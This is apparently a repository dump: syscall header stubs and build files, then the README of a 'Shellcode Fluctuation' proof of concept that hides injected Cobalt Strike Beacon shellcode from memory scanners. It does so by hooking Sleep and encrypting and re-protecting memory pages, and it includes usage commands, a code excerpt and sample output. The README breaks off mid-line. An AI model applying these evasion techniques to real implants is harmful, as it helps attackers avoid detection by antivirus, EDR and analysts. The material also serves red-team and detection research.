POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER MaximumSize OPTIONAL,\r\n\tIN ULONG SectionPageProtection,\r\n\tIN ULONG AllocationAttributes,\r\n\tIN HANDLE FileHandle OPTIONAL,\r\n\tIN PMEM_EXTENDED_PARAMETER ExtendedParameters,\r\n\tIN ULONG ExtendedParametersCount);\r\n\r\nEXTERN_C NTSTATUS NtCreateCrossVmEvent();\r\n\r\nEXTERN_C NTSTATUS NtGetPlugPlayEvent(\r\n\tIN HANDLE EventHandle,\r\n\tIN PVOID Context OPTIONAL,\r\n\tOUT PPLUGPLAY_EVENT_BLOCK EventBlock,\r\n\tIN ULONG EventBufferSize);\r\n\r\nEXTERN_C NTSTATUS NtListTransactions();\r\n\r\nEXTERN_C NTSTATUS NtMarshallTransaction();\r\n\r\nEXTERN_C NTSTATUS NtPullTransaction();\r\n\r\nEXTERN_C NTSTATUS NtReleaseCMFViewOwnership();\r\n\r\nEXTERN_C NTSTATUS NtWaitForWnfNotifications();\r\n\r\nEXTERN_C NTSTATUS NtStartTm();\r\n\r\nEXTERN_C NTSTATUS NtSetInformationProcess(\r\n\tIN HANDLE DeviceHandle,\r\n\tIN PROCESSINFOCLASS ProcessInformationClass,\r\n\tIN PVOID ProcessInformation,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtRequestDeviceWakeup(\r\n\tIN HANDLE DeviceHandle);\r\n\r\nEXTERN_C NTSTATUS NtRequestWakeupLatency(\r\n\tIN ULONG LatencyTime);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemTime(\r\n\tOUT PLARGE_INTEGER SystemTime);\r\n\r\nEXTERN_C NTSTATUS NtManageHotPatch(\r\n\tIN ULONG UnknownParameter1,\r\n\tIN ULONG UnknownParameter2,\r\n\tIN ULONG UnknownParameter3,\r\n\tIN ULONG UnknownParameter4);\r\n\r\nEXTERN_C NTSTATUS NtContinueEx(\r\n\tIN PCONTEXT ContextRecord,\r\n\tIN PKCONTINUE_ARGUMENT ContinueArgument);\r\n\r\nEXTERN_C NTSTATUS RtlCreateUserThread(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,\r\n\tIN BOOLEAN CreateSuspended,\r\n\tIN ULONG StackZeroBits,\r\n\tIN OUT PULONG StackReserved,\r\n\tIN OUT PULONG StackCommit,\r\n\tIN PVOID StartAddress,\r\n\tIN PVOID StartParameter OPTIONAL,\r\n\tOUT PHANDLE ThreadHandle,\r\n\tOUT PCLIENT_ID ClientID);\r\n\r\n#endif\r\n\r\n\r\nEXTERN_C NTSTATUS ANtCTE(\r\n\tHANDLE* pHandle,\r\n\tACCESS_MASK DesiredAccess,\r\n\tPVOID pAttr,\r\n\tHANDLE hProc,\r\n\tPVOID pFunc,\r\n\tPVOID pArg,\r\n\tULONG Flags,\r\n\tSIZE_T ZeroBits,\r\n\tSIZE_T StackSize,\r\n\tSIZE_T MaxStackSize,\r\n\tPVOID pAttrListOut\r\n);" }, { "path": "chapter4-demo3/demo1/x64/Debug/demo1.exe.recipe", "content": "\r\n\r\n \r\n \r\n E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo3/demo1/x64/Debug/demo1.log", "content": " demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n" }, { "path": "chapter4-demo3/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|E:\\last\\demo1\\|\r\n" }, { "path": "chapter4-demo3/demo1/x64/Release/demo1.exe.recipe", "content": "\r\n\r\n \r\n \r\n E:\\last\\demo3\\x64\\Release\\demo1.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo3/demo1/x64/Release/demo1.log", "content": " demo1.cpp\r\nE:\\last\\demo3\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo3\\demo1\\demo1.cpp(29,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(34,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(39,16): warning C4018: “<”: 有符号/无符号不匹配\r\nE:\\last\\demo3\\demo1\\demo1.cpp(386,32): error C2026: 字符串太大,已截断尾部字符\r\nE:\\last\\demo3\\demo1\\demo1.cpp(411,58): warning C4267: “初始化”: 从“size_t”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(412,16): warning C4244: “初始化”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(417,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(416,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(425,20): warning C4018: “<=”: 有符号/无符号不匹配\r\nE:\\last\\demo3\\demo1\\demo1.cpp(452,20): warning C4018: “<”: 有符号/无符号不匹配\r\n" }, { "path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|E:\\last\\demo3\\|\r\n" }, { "path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/unsuccessfulbuild", "content": "" }, { "path": "chapter4-demo3/demo1.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"demo1\", \"demo1\\demo1.vcxproj\", \"{1876F365-2DEC-42C9-B80E-B631B26FCAD8}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "chapter4-demo4/CODE_OF_CONDUCT.md", "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nWe as members, contributors, and leaders pledge to make participation in our\ncommunity a harassment-free experience for everyone, regardless of age, body\nsize, visible or invisible disability, ethnicity, sex characteristics, gender\nidentity and expression, level of experience, education, socio-economic status,\nnationality, personal appearance, race, religion, or sexual identity\nand orientation.\n\nWe pledge to act and interact in ways that contribute to an open, welcoming,\ndiverse, inclusive, and healthy community.\n\n## Our Standards\n\nExamples of behavior that contributes to a positive environment for our\ncommunity include:\n\n* Demonstrating empathy and kindness toward other people\n* Being respectful of differing opinions, viewpoints, and experiences\n* Giving and gracefully accepting constructive feedback\n* Accepting responsibility and apologizing to those affected by our mistakes,\n and learning from the experience\n* Focusing on what is best not just for us as individuals, but for the\n overall community\n\nExamples of unacceptable behavior include:\n\n* The use of sexualized language or imagery, and sexual attention or\n advances of any kind\n* Trolling, insulting or derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or email\n address, without their explicit permission\n* Other conduct which could reasonably be considered inappropriate in a\n professional setting\n\n## Enforcement Responsibilities\n\nCommunity leaders are responsible for clarifying and enforcing our standards of\nacceptable behavior and will take appropriate and fair corrective action in\nresponse to any behavior that they deem inappropriate, threatening, offensive,\nor harmful.\n\nCommunity leaders have the right and responsibility to remove, edit, or reject\ncomments, commits, code, wiki edits, issues, and other contributions that are\nnot aligned to this Code of Conduct, and will communicate reasons for moderation\ndecisions when appropriate.\n\n## Scope\n\nThis Code of Conduct applies within all community spaces, and also applies when\nan individual is officially representing the community in public spaces.\nExamples of representing our community include using an official e-mail address,\nposting via an official social media account, or acting as an appointed\nrepresentative at an online or offline event.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be\nreported to the community leaders responsible for enforcement at\nMariusz Banach (mgeeky, @mariuszbit, mb@binary-offensive.com).\nAll complaints will be reviewed and investigated promptly and fairly.\n\nAll community leaders are obligated to respect the privacy and security of the\nreporter of any incident.\n\n## Enforcement Guidelines\n\nCommunity leaders will follow these Community Impact Guidelines in determining\nthe consequences for any action they deem in violation of this Code of Conduct:\n\n### 1. Correction\n\n**Community Impact**: Use of inappropriate language or other behavior deemed\nunprofessional or unwelcome in the community.\n\n**Consequence**: A private, written warning from community leaders, providing\nclarity around the nature of the violation and an explanation of why the\nbehavior was inappropriate. A public apology may be requested.\n\n### 2. Warning\n\n**Community Impact**: A violation through a single incident or series\nof actions.\n\n**Consequence**: A warning with consequences for continued behavior. No\ninteraction with the people involved, including unsolicited interaction with\nthose enforcing the Code of Conduct, for a specified period of time. This\nincludes avoiding interactions in community spaces as well as external channels\nlike social media. Violating these terms may lead to a temporary or\npermanent ban.\n\n### 3. Temporary Ban\n\n**Community Impact**: A serious violation of community standards, including\nsustained inappropriate behavior.\n\n**Consequence**: A temporary ban from any sort of interaction or public\ncommunication with the community for a specified period of time. No public or\nprivate interaction with the people involved, including unsolicited interaction\nwith those enforcing the Code of Conduct, is allowed during this period.\nViolating these terms may lead to a permanent ban.\n\n### 4. Permanent Ban\n\n**Community Impact**: Demonstrating a pattern of violation of community\nstandards, including sustained inappropriate behavior, harassment of an\nindividual, or aggression toward or disparagement of classes of individuals.\n\n**Consequence**: A permanent ban from any sort of public interaction within\nthe community.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage],\nversion 2.0, available at\nhttps://www.contributor-covenant.org/version/2/0/code_of_conduct.html.\n\nCommunity Impact Guidelines were inspired by [Mozilla's code of conduct\nenforcement ladder](https://github.com/mozilla/diversity).\n\n[homepage]: https://www.contributor-covenant.org\n\nFor answers to common questions about this code of conduct, see the FAQ at\nhttps://www.contributor-covenant.org/faq. Translations are available at\nhttps://www.contributor-covenant.org/translations.\n" }, { "path": "chapter4-demo4/LICENSE.txt", "content": "MIT License\n\nCopyright (c) 2021 Mariusz Banach (mgeeky, )\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "chapter4-demo4/README.md", "content": "# Shellcode Fluctuation PoC\n\nA PoC implementation for an another in-memory evasion technique that cyclically encrypts and decrypts shellcode's contents to then make it fluctuate between `RW` (or `NoAccess`) and `RX` memory protection.\nWhen our shellcode resides in `RW` or `NoAccess` memory pages, scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve) will be unable to track it down and dump it for further analysis.\n\n## Intro\n\nAfter releasing [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) I've received a few questions about the following README's point:\n\n> Change your Beacon's memory pages protection to RW (from RX/RWX) and encrypt their contents before sleeping (that could evade scanners such as Moneta or pe-sieve)\n\nBeforewards I was pretty sure the community already know how to encrypt/decrypt their payloads and flip their memory protections to simply evade memory scanners looking for anomalous executable regions.\nQuestions proven otherwise so I decided to release this unweaponized PoC to document yet another evasion strategy and offer sample implementation for the community to work with.\n\nThis PoC is a demonstration of rather simple technique, already known to the offensive community (so I'm not bringin anything new here really) in hope to disclose secrecy behind magic showed by some commercial frameworks that demonstrate their evasion capabilities targeting both aforementioned memory scanners.\n\n\n**Here's a comparison when fluctuating to RW** (another option is to fluctuate to `PAGE_NOACCESS` - described below):\n\n1. Beacon not encrypted\n2. **Beacon encrypted** (_fluctuating_)\n\n![comparison](images/comparison.png)\n\n\nThis implementation along with my [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪\n\n---\n\n## How it works?\n\nThis program performs self-injection shellcode (roughly via classic `VirtualAlloc` + `memcpy` + `CreateThread`). \nWhen shellcode runs (this implementation specifically targets Cobalt Strike Beacon implants) a Windows function will be hooked intercepting moment when Beacon falls asleep `kernel32!Sleep`. \nWhenever hooked `MySleep` function gets invoked, it will localise its memory allocation boundaries, flip their protection to `RW` and `xor32` all the bytes stored there. \nHaving awaited for expected amount of time, when shellcode gets back to our `MySleep` handler, we'll decrypt shellcode's data and flip protection back to `RX`.\n\n### Fluctuation to `PAGE_READWRITE` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. In contrary to what we had in `ThreadStackSpoofer`, here we're not hooking anything in ntdll to launch our shellcode but rather jump to it from our own function. This attempts to avoid leaving simple IOCs in memory pointing at modified ntdll memory.\n3. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.\n4. Beacon's memory allocation gets encrypted and protection flipped to `RW`\n5. We then unhook original `kernel32!Sleep` to avoid leaving simple IOC in memory pointing that `Sleep` have been trampolined (in-line hooked).\n5. A call to original `::Sleep` is made to let the Beacon's sleep while waiting for further communication.\n11. After Sleep is finished, we decrypt our shellcode's data, flip it memory protections back to `RX` and then re-hook `kernel32!Sleep` to ensure interception of subsequent sleep.\n\n### Fluctuation to `PAGE_NOACCESS` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread` ...\n4. Initialize Vectored Exception Handler (VEH) to setup our own handler that will catch _Access Violation_ exceptions.\n5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.\n6. Beacon's memory allocation gets encrypted and protection flipped to `PAGE_NOACCESS`\n7. We then unhook original `kernel32!Sleep` to avoid leaving simple IOC in memory pointing that `Sleep` have been trampolined (in-line hooked).\n8. A call to original `::Sleep` is made to let the Beacon's sleep while waiting for further communication.\n9. After Sleep is finished, we re-hook `kernel32!Sleep` to ensure interception of subsequent sleep.\n10. Shellcode then attempts to resume its execution which results in Access Violation being throwed since its pages are marked NoAccess.\n11. Our VEH Handler catches the exception, decrypts and flips memory protections back to `RX` and shellcode's is resumed.\n\n---\n\n### It's not a novel technique\n\nThe technique is not brand new, nothing that I've devised myself. Merely an implementation showing the concept and its practical utilisation to let our Offensive Security community catch up on offering made by commercial C2 frameworks. \n\nActually, I've been introduced to the idea of flipping shellcode's memory protection couple of years back through the work of [**Josh Lospinoso**](https://github.com/JLospinoso) in his amazing [Gargoyle](https://github.com/JLospinoso/gargoyle).\n\nHere's more background:\n- [gargoyle, a memory scanning evasion technique](https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)\n- [Bypassing Memory Scanners with Cobalt Strike and Gargoyle](https://labs.f-secure.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/)\n\n**Gargoyle** takes the concept of self-aware and self-fluctuating shellcode a way further, by leveraging ROP sequence calling out to `VirtualProtect`. \nHowever the technique is impressive, its equally hard to leverage it with Cobalt Strike's Beacon without having to kill its thread and keep re-initializing Beacon while in memory.\n\nThat's far from perfect, however since we already operate from the grounds of our own self-injection loader process, we're able to do whatever we want with the environment in which shellcode operate and hide it however we like. This technique (and the previous one being [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer)) shows advantages from running our shellcodes this way.\n\nThe implementation of fluctuating to `PAGE_NOACCESS` is inspired by [ORCA666](https://github.com/ORCA666)'s work presented in his https://github.com/ORCA666/0x41 injector.\nHe showed that:\n\n1. we can initialize a vectored exception handler (VEH), \n2. flip shellcode's pages to no-access\n3. and then catch Access Violation exceptions that will occur as soon as the shellcode wants to resume its execution and decrypt + flip its memory pages back to Read+Execute.\n\nThis implementation contains this idea implemented, available with option `2` in ``. \nBe sure to check out other his projects as well.\n\n---\n\n## Demo\n\nThe tool `ShellcodeFluctuation` accepts three parameters: first one being path to the shellcode and the second one modifier of our functionality.\n\n```\nUsage: ShellcodeFluctuation.exe \n:\n -1 - Read shellcode but dont inject it. Run in an infinite loop.\n 0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n 1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n 2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\n### Moneta (seemingly) False Positive\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin -1\n```\n\nSo firstly we'll see what `Moneta64` scanner thinks about process that does nothing dodgy and simply resorts to run an infinite loop:\n\n![moneta false positive](images/false-positive.png)\n\nAs we can see there's some **false positive** (at least how I consider it) allegdly detecting `Mismatching PEB module` / `Phantom image`. \nThe memory boundaries point at the `ShellcodeFluctuate.exe` module itself and could indicate that this module however being of `MEM_IMAGE` type, is not linked in process' PEB - which is unsual and sounds rather odd.\nThe reason for this IOC is not known to me and I didn't attempt to understand it better, yet it isn't something we should be concerned about really.\n\nIf anyone knows what's the reason for this detection, I'd be very curious to hear! Please do reach out.\n\n### Not Encrypted Beacon\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 0\n```\n\nThe second use case presents Memory IOCs of a Beacon operating within our process, which does not utilise any sorts of customised `Artifact Kits`, `User-Defined Reflective Loaders` (such as my [`ElusiveMice`](https://github.com/mgeeky/ElusiveMice)), neither any initial actions that would spoil our results. \n\n![moneta not encrypted](images/not-encrypted.png)\n\nWe can see that `Moneta64` correctly recognizes `Abnormal private executable memory` pointing at the location where our shellcode resides. \nThat's really strong Memory IOC exposing our shellcode for getting dumped and analysed by automated scanners. Not cool.\n\n### Encrypted Beacon with RW protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 1\n```\n\nNow the third, most interesting from perspective of this implementation, use case being _fluctuating_ Beacon.\n\n![moneta encrypted](images/encrypted.png)\n\nApart from the first IOC, considered somewhat _false positive_, we see a new one pointing that `kernel32.dll` memory was modified. \nHowever, no `Abnormal private executable memory` IOC this time. Our fluctuation (repeated encryption/decryption and memory protections flipping is active).\n\nAnd for the record, `pe-sieve` also detects implanted PE when used with `/data 3` option (unless this option is given, no detection will be made):\n\n![pe-sieve](images/pe-sieve3.png)\n\nMy current assumption is that PE-Sieve is picking up on the same traits that Moneta does (described below in _Modified code in kernel32.dll_) - the fact that PE mapped module has a non-empty Working set, being an evident fact of code injection of some sort.\nThat is labeled as _Implanted PE_ / _Implanted_. If that's the case, conclusion is similar to the Moneta's observation. I don't think we should care that much about that IOC detection-wise.\n\nCurrently I thought of no better option to intercept shellcode's execution in the middle (now speaking of Cobalt Strike), other than to hook `kernel32!Sleep`. Thus, we are bound to leave these sorts of IOCs.\n\nBut hey, still none of the bytes differ compared to what is lying out there on the filesystem (`C:\\Windows\\System32\\kernel32.dll`) and no function is hooked, what's the deal? 😉\n\n\n\n### Encrypted Beacon with PAGE_NOACCESS protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 2\n```\n\n![no-access](images/no-access1.png)\n\nThat will cause the shellcode to fluctuate between `RX` and `NA` pages effectively.\n\nAt the moment I'm not sure of benefits of flipping into `PAGE_NOACCESS` instead of `PAGE_READWRITE`. \n\n\n### Modified code in kernel32.dll\n\nSo what about that modified `kernel32` IOC?\n\nNow, let us attempt to get to the bottom of this IOC and see what's the deal here.\n\nFirstly, we'll dump mentioned memory region - being `.text` (code) section of `kernel32.dll`. Let us use `ProcessHacker` for that purpose to utilise publicly known and stable tooling:\n\n![dump-kernel](images/dump-kernel.png)\n\nWe dump code section of allegedly modified kernel32 and then we do the same for the kernel32 running in process that did not modify that area.\n\nHaving acquired two dumps, we can then compare them byte-wise (using my [expdevBadChars](https://github.com/mgeeky/expdevBadChars)) to look for any inconsitencies:\n\n![bindiff](images/bindiff0.png)\n\nJust to see that they match one another. Clearly there isn't a single byte modified in `kernel32.dll` and the reason for that is because we're unhooking `kernel32!Sleep` before calling it out:\n\n`main.cpp:31:`\n```\n HookTrampolineBuffers buffers = { 0 };\n buffers.originalBytes = g_hookedSleep.sleepStub;\n buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n //\n // Unhook kernel32!Sleep to evade hooked Sleep IOC. \n // We leverage the fact that the return address left on the stack will make the thread\n // get back to our handler anyway.\n //\n fastTrampoline(false, (BYTE*)::Sleep, &MySleep, &buffers);\n\n // Perform sleep emulating originally hooked functionality.\n ::Sleep(dwMilliseconds);\n```\n\nSo what's causing the IOC being triggered? Let us inspect `Moneta` more closely:\n\n![moneta](images/moneta.png)\n\nBreaking into Moneta's `Ioc.cpp` just around the 104 line where it reports `MODIFIED_CODE` IOC, we can modify the code a little to better expose the exact moment when it analyses kernel32 pool.\nNow:\n\n1. The check is made to ensure that kernel32's region is executable. We see that in fact that region is executable `a = true`\n2. Amount of that module's private memory is acquired. Here we see that `kernel32` has `b = 0x1000` private bytes. How come? There should be `0` of them.\n3. If executable allocation is having more than 0 bytes of private memory (`a && b`) the IOC is reported\n4. And that's a proof we were examining kernel32 at that time.\n\nWhen Windows Image Loader maps a DLL module into process' memory space, the underlying memory pages will be labeled as `MEM_MAPPED` or `MEM_IMAGE` depending on scenario. \nWhenever we modify even a single byte of the `MEM_MAPPED`/`MEM_IMAGE` allocation, the system will separate a single memory page (assuming we modified less then `PAGE_SIZE` bytes and did not cross page boundary) to indicate fragment that does not maps back to the original image.\n\nThis observation is then utilised as an IOC - an image should not have `MEM_PRIVATE` allocations within its memory region (inside of it) because that would indicate that some bytes where once modified within that region. Moneta is correctly picking up on code modification if though bytes were matching original module's bytes at the time of comparison.\n\nFor a comprehensive explanation of how Moneta, process injection implementation and related IOC works under the hood, read following top quality articles by **Forrest Orr**:\n\n1. [Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing](https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing)\n2. [Masking Malicious Memory Artifacts – Part II: Blending in with False Positives](https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-ii-insights-from-moneta)\n3. [Masking Malicious Memory Artifacts – Part III: Bypassing Defensive Scanners](https://www.cyberark.com/resources/threat-research-blog/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners)\n\nThat's a truly outstanding research and documentation done by Forrest, great work pal!\n\nEspecially the second article outlines the justification for this detection, as we read what Forrest teaches us:\n\n> In the event that the module had been legitimately loaded and added to the PEB, the shellcode implant would still have been detected due to the 0x1000 bytes (1 page) of memory privately mapped into the address space and retrieved by Moneta by querying its working set - resulting in a modified code IOC as seen above.\n\n\nTo summarise, we're leaving an IOC behind but should we be worried about that?\nEven if there's an IOC there are no stolen bytes visible, so no immediate reference pointing back to our shellcode or distinguishing our shellcode's technique from others.\n\nLong story short - we shouldn't be really worried about that IOC. :-)\n\n\n### But commercial frameworks leave no IOCs\n\nOne can say, that this implementation is far from perfect because it leaves something, still there are IOCs and the commercial products show they don't have similar traits.\n\nWhen that argument's on the table I need to remind, that, the commercial frameworks have complete control over source code of their implants, shellcode loaders and thus can nicely integrate one with another to avoid necessity of hooking and hacking around their shellcode themselves. Here, we need to hook `kernel32!Sleep` to intercept Cobalt Strike's Beacon execution just before it falls asleep in order to kick on with our housekeeping. If there was a better mechanism for us kicking in without having to hook sleep - that would be perfect.\n\nHowever there is a notion of [_Sleep Mask_](https://www.cobaltstrike.com/help-sleep-mask-kit) introduced to Cobalt Strike, the size restrictions for being hundreds of byte makes us totally unable to introduce this logic to the mask itself (otherwise we'd be able not to hook `Sleep` as well, leaving no IOCs just like commercial products do).\n\nAnother argument might be, that commercial framework integrate these sorts of logic into their _Reflective Loaders_ and here we instead leave it in EXE harness.\nThat's true, but the reason for such a decision is twofold:\n\n1. I need to be really careful with releasing this kind of technology to avoid the risk of helping weaponize the real-world criminals with an implementation that will haunt us back with another Petya. In that manner I decided to skip some of the gore details that I use in my professional tooling used to deliver commercial, contracted Adversary Simulation exercises. Giving out the seed hopefully will be met with community professionals able to grow the concept in their own toolings, assuming they'll have apropriate skills.\n\n2. I'd far prefer to move this entire logic to the [_User-Defined Reflective Loader_](https://www.cobaltstrike.com/help-user-defined-reflective-loader) of Cobalt Strike facilitating Red Team groups in elevated chances for their delivery phase. But firstly, see point (1), secondly that technology is currently limited to 5KBs size for their RDLLs, making me completely unable to implement it there as well. For those of us who build custom C2 & implants for in-house Adversary Simulation engagements - they now have received a sample implementation that will surely help them embellishing their tooling accordingly.\n\n---\n\n## How do I use it?\n\nLook at the code and its implementation, understand the concept and re-implement the concept within your own Shellcode Loaders that you utilise to deliver your Red Team engagements.\nThis is an yet another technique for advanced in-memory evasion that increases your Teams' chances for not getting caught by Anti-Viruses, EDRs and Malware Analysts taking look at your implants.\n\nWhile developing your advanced shellcode loader, you might also want to implement:\n\n- **Process Heap Encryption** - take an inspiration from this blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/) - which can let you evade Beacon configuration extractors like [`BeaconEye`](https://github.com/CCob/BeaconEye)\n- [**Spoof your thread's call stack**](https://github.com/mgeeky/ThreadStackSpoofer) before sleeping (that could evade scanners attempting to examine process' threads and their call stacks in attempt to hunt for `MEM_PRIVATE` memory allocations referenced by these threads)\n- **Clear out any leftovers from Reflective Loader** to avoid in-memory signatured detections\n- **Unhook everything you might have hooked** (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.\n\n---\n\n## Example run\n\nUse case:\n\n```\nUsage: ShellcodeFluctuation.exe \n:\n -1 - Read shellcode but dont inject it. Run in an infinite loop.\n 0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n 1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n 2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\nWhere:\n- `` is a path to the shellcode file\n- `` as described above, takes `-1`, `0` or `1`\n\n\nExample run that spoofs beacon's thread call stack:\n\n```\nC:\\> ShellcodeFluctuation.exe ..\\..\\tests\\beacon64.bin 1\n\n[.] Reading shellcode bytes...\n[.] Hooking kernel32!Sleep...\n[.] Injecting shellcode...\n[+] Shellcode is now running. PID = 9456\n[+] Fluctuation initialized.\n Shellcode resides at 0x000002210C091000 and occupies 176128 bytes. XOR32 key: 0x1e602f0d\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n\n[.] Decoding...\n[>] Flipped to RX.\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n```\n\n---\n\n## Word of caution\n\nIf you plan on adding this functionality to your own shellcode loaders / toolings be sure to **AVOID** unhooking `kernel32.dll`.\nAn attempt to unhook `kernel32` will restore original `Sleep` functionality preventing our callback from being called.\nIf our callback is not called, the thread will be unable to spoof its own call stack by itself.\n\nIf that's what you want to have, than you might need to run another, watchdog thread, making sure that the Beacons thread will get spoofed whenever it sleeps.\n\nIf you're using Cobalt Strike and a BOF `unhook-bof` by Raphael's Mudge, be sure to check out my [Pull Request](https://github.com/Cobalt-Strike/unhook-bof/pull/1) that adds optional parameter to the BOF specifying libraries that should not be unhooked.\n\nThis way you can maintain your hooks in kernel32:\n\n```\nbeacon> unhook kernel32\n[*] Running unhook.\n Will skip these modules: wmp.dll, 